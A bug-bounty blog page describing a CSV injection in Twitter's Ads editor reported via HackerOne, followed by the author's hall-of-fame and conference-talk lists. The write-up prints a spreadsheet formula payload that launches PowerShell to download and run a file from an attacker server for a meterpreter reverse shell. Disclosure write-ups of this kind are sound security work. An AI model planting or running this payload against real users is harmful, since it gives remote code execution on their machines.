Twitter CSV Injection - Going beyond Pop-Up Calculator to Taking Meterpreter Shell

2 Comments


Hi folks,

After a long time, I thought of publishing one of my findings. Back in time, I targeted `Twitter` Application in a hope of getting some juicy bugs.  This time I was looking into searching for some different bugs apart from looking up for XSS, SQLi etc.


tl;dr - this vulnerability is exploiting CSV injection, to gain meterpreter session on a victim's local system.

How it started :- 

I was testing one of the twitter features called ‘Ads editor’.
According to twitter, with Ads editor, you can leverage the power of Excel to manage your campaigns at scale.  That sounds cool as it is using a feature like ‘Excel’.  Also there is an option under Edit access to account in which the account admin can add different users and assign the role accordingly [Roles are: - Account Administrator, Ad Manager and Analyst ]


By this time I was pretty clear to check out "CSV Injection Attack".


Proof of Concept :- 

I noticed that the `Name your audience` field was vulnerable to CSV injection that could be chained with a meterpreter payload resulting in client side remote code execution.

I sent this bug report with all the details to the Twitter security team

And I got the below revert




But wait



HOPES ALIVE :)

I created a video POC containing full exploitation in which I was able to take reverse shell connection back to the attacker's machine by using
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0


OR
Click here for Direct Video Link

Above payload works in such a way that when the CSV file is opened, powershell is launched in the background which attempts to grab the Powersploit payload of Invoke-Shellcode to attempt a reverse shell connection back to the attacker's server.

Well, what next..

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEt1q8x57fVeCZNmwV8z0d3wW6FkLMT6HQro2BhCqnlun9FDd9IGmbn87Cp2PZu5vJsK1LVvt6iwv2-4u5TnkHDqryl9S53UxmeK_GOZ5W1PzJ8eSbrnzDbm3P5xaLdoaeeEeMykXg3IU/s400/POC+4.jpg


This is how the life of a bug hunter looks like.

Moral Of The Story:- 
I never tried going beyond Pop-Up Calculator whenever I submitted bugs related to CSV injection, but this gave me an opportunity to exploit. So on a positive note, accept the things and then move on. And most importantly, if you fail? Well, try harder!

Time-Line:

Vulnerability timeline:

Aug 14, 2016   : Reported to Twitter Security Team via Hackerone platform.
Aug 17, 2016  :  Report marked as "Duplicate"
Aug 17, 2016  :  Report reopen and status changed to "Need More Info"
Aug 17, 2016  :  Shared the video POC exploit.
Aug 23, 2016  :  Report again marked as "Duplicate"
June 23, 2017 :  As per Hackerone Policy Responsible disclosure.

Hall Of Fame

Add Comment

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ8HhM61GUWOfeahxjvhpVYwNtTK5VtKMTeHmc1Mci6UhHbBGEDcs3NG4qqp8a6qx4cmnccxrZKu4EUkaeNuHiVHavjspSmHWUfKXwzaJu3rfLy084VHuUKokE7NboFxC4yAv0aRcHtvQ/s400/Hall+Of+Fame.jpg


I have been helping companies improve their security by finding vulnerabilities in their software and helping them patch it, and they included me in their security acknowledgements page for reporting valid security issue issues: 






C:\Users\Nilesh\Desktop\Google-favicon-2015.png                        Google   - HOF Link  - HOF Image



https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0ax0iGfPbBpfGhi-ifmp9BGYb2JfUG0-i3A2n9gc88AS_IJ_MceinBexaU671Q2Sl59LuxKhT5W6aENQm6raTS3nKsPEEtkaDiJ5J5iZqL9ltlgPX15yC505aoskGEYX27EuO-Ng7mI/s1600/microsoft.jpg                        MicrosoftHOF Link  - HOF Image



https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxkWh6ZXgB3gyqQ0Weuo3CSegnlKljgTY5qcvSI3Cgf8N-7d3xXUXOGfycJHSG84jPfNdXMRHjxqFUN2kxmAmz11D-dASCxgjLSOVWQcZdLmshuZjzKLHYawe9-YtcZtr1hp_bZGingc/s200/yahoo.jpg               YahooHOF Link 
      Imagesource 


  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqDRx3mhnd32UbzgTTIkQfGfW3qkHQMBg-66CJ2P5g7ECgoUxaBvqF-SvMUqzMU2FlOBpHBxGn3V6ZwboqJY-qtz6LNoF_Rrxvi6Ry8Aap5SHk9tLGNM82ATiM8-gqX-uVhU9ir-P_m7Q/s1600/adobe.jpg                         Adobe HOF Link 
      Imagesource


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qTTL8MMuSp_dB8NoI6O5b2aWXcKObNmmktnHQ_S9GFL8UeqXaH57DBVqbeESKUe2WZ2W1XwUkaFoWzUxK2Js-C-2ls3597FUH4xMiTeCyCjMGZqlNy6s0Jw85U4i2XUcglKCj1jhPVA/s1600/redhat_logo_small_.jpg                Redhat HOF Link  
       Imagesource


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBBvBoVo3q-9mauW1C3t2cEnNHLoKGoIbk3EuvvS8ESLIxN-wwWMwoT75k7S9b0V3vd5AedJbpcCR3KkECijFIAjzvDR6_2Sz0_KmOO2N_y4yGv86k8lvtD_5ZdGZ4BUsaFUr9R9N2VC8/s1600/att.jpg                 AT&T HOF Link - HOF Image
          Imagesource



 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWKtJhEPWXPzySA9m50vUSUKayEnLDRL-cWohrIiQnRveWZxxd0xTo1zFQ8gMYFJSU5D_kkMQOoc6y5nNHGPE5wpq2ck6EVDxtVZvz3ppSPGVrz8uzuCylFT1mMd7s6WaL3tUo3MwCdsA/s1600/bb.jpg                     BlackBerry - HOF Link
        Imagesource


 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYk3WL4IVON603CUdbUNSwaljQmE1HLMQHGnBqe_SKSVZmguc6ojq4WmMAiSYh1pTqwsDKBgXQo_3ki5yiv22B0Sy7DdcQm5bMzLNlCA213aRgtk3Ryu3CMqyEOyMFuLnPHOnRGfbFaQ/s1600/sony.jpg                      Sony - HOF Link 
     Imagesource



 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYXQTfIzHvctNb7AteMuIqzcZoSEJF46QkNypvsk1ogcDs9A5FkR0DnoSh32WDYcy1V2VdfPWwdt2Ql4OGYbgdk37I4SkrEaDwydM2lPV3JdyQab59iqhg8spEIGoQY4MTihC34vDrUnI/s1600/gm.jpg                     General Motor - HOF Link 
     Imagesource 



C:\Users\Nilesh\Desktop\owasp_logo.jpg                OWASP - HOF Link 
    Imagesource 



  C:\Users\Nilesh\Desktop\cobalt-logo+mark-943a17b2ee991b50c0709e6b32b6adcfa6740e20248df51663137cc011380756.png                  Cobalt - HOF Link 
      Imagesource 



  C:\Users\Nilesh\Desktop\test.jpg                 Blockchain - HOF Link 
     Imagesource 


    C:\Users\Nilesh\Desktop\OLX_Logo.jpg                  OLX - HOF Link 
      Imagesource    


    C:\Users\Nilesh\Desktop\imgur.jpg                   ImgurHOF Link
       Imagesource    
 

And many more...
 







Conference Talks

Add Comment
The Journey :- 

Back in time when I was a new bie in Infosec domain I was trying my hands to learn the basics of infosec this includes workshops, blogs to learn the basics. The most important question running in my mind was from where do I start so that I can make the first step up the ladder of this journey to become Ethical Hacker.

Thankfully, by the grace of God my all hard work paid off. [Big story]

My first talk was at null Mumbai chapter after that I started getting many invites from different colleges to conduct the workshop on Ethical hacking and then the journey of delivering talks began and now there is no looking back to help all the beginners and supporting all the people who are hunting the way to become hacker or info sec geek.  So now to make sure that the new bie avoid this struggle which I faced during my beginning I started helping and supporting via this medium.

In this journey many people asked "You started taking seminars or conference, so is it for the Money.. Fame.. Publicity stunt OR bla bla? " So here is the answer to all those people.


Let's come back to the current state and see what this blog section is about?

I have conducted many Security Talks at different colleges and events which I will be listing in this section.

So if you want to conduct Security Talks at your colleges, then drop an email.
I would love to share the knowledge.


Year 2018

1] Got invited for conducting workshop on "Ethical Hacking" at Sardar Patel Institute Of Technology

Venue details:- 
SPIT College - 14th Aug 2018

Audience :- 
MCA Department






















Year 2017

1] Got invited for conducting workshop on "Ethical Hacking - Security Attacks/Tools/Mitigation Techniques" at Shri Bhagubhai Mafatlal Polytechnic - SVKM

Venue details:- 
Shri Bhagubhai Mafatlal Polytechnic - 15th March 2017

Audience :- 
Department of Information Technology - Shri Bhagubhai Mafatlal Polytechnic







2] Got invited for conducting workshop on "AICTE-ISTE approved Ethical Hacking workshop" at SIES Graduate School of Technology

Venue details:- 
SIES Graduate School of Technology, Vidyapuram, Sector 5, Nerul, Navi Mumbai - 2nd July 2017

Audience :- 
The Computer Engineering department of SIES Graduate School of Technology
AICTE-ISTE approved Ethical Hacking workshop
AICTE :- All India Council for Technical Education (AICTE)
ISTE  :- Indian Society for Technical Education (ISTE)







3] Got invited for conducting workshop on "Ethical Hacking" at SNDT College - Shri M.D. Shah Mahila College of Arts and Commerce. 

Venue details:- 
BJ Patel Rd, Near Liberty Garden, Malad West, Mumbai, Maharashtra 400064 - 9th September 2017

Audience :- 
BCA Students











Year 2016

1] Got invited for conducting workshop on "Cyber Security - Hands-On Workshops" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 8th Oct 2015

Audience :- 
Department of Information Technology and Masters of computer application







Year 2015

1] Got invited for conducting workshop on "Cyber Security" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 3rd Oct 2015

Audience :- 
MCA Department














2] Conducted workshop on "It's all about CSRF" at null Mumbai Meet

Venue details :-
null Mumbai Meet 10 January 2015 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
It's all about CSRF










Year 2014

1] Conducted workshop on "Wireless Security

Venue details :-
null Mumbai Meet 13 September 2014 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
Wireless Security